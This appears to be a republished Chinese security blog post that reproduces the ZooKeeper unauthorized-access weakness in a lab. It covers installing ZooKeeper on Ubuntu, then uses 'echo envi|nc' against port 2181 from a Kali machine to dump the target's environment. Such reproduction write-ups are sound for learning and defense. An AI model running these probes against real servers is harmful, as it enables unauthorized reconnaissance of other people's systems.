Zookeeper未授权访问漏洞
2020-03-11 11:18:06 Author: mp.weixin.qq.com(查看原文) 阅读量:114 收藏


ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。

Zookeeper 的默认开放端口是2181。Zookeeper 安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用 Zookeeper,通过服务器收集敏感信息或者在 Zookeeper 集群内进行破坏(比如:kill命令)。攻击者能够执行所有只允许由管理员运行的命令。

环境安装

本次在Ubuntu18.04上安装

安装包链接:

http://archive.apache.org/dist/zookeeper/zookeeper-3.4.10/

#解压

tar -zxvf zookeepre-3.4.10.tar.gz

#进入配置文件目录

cd /zookeeper-3.4.10/conf

#将配置文件zoo_sample.cfg拷贝一份,命名为zoo.cfg

cp zoo_sample.cfg zoo.cfg

#打开zoo.cfg     

配置单机模式

vi zoo.cfg

启动zookeeper

cd到zookeeper底下的bin目录#启动./zkServer.sh start
##测试连接
zkCli.sh -server localhost:2181

 

漏洞验证

同样在kali机上安装zookeeper

攻击机:kali

靶机:ubuntu

1、对靶机进行未授权连接


2、使用命令获取目标的环境

echo envi|nc 192.168.123.124 2181

推荐文章++++

*CVE-2019-17671:wrodpress 未授权访问漏洞-复现


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650460164&idx=3&sn=825625d5cc4496523aaf2750dc743b0c&chksm=83bbb5e0b4cc3cf6af491db9005d02240d5aa196c127d551e08f8b8d104ed07ee42ea4b74f64#rd
如有侵权请联系:admin#unsafe.sh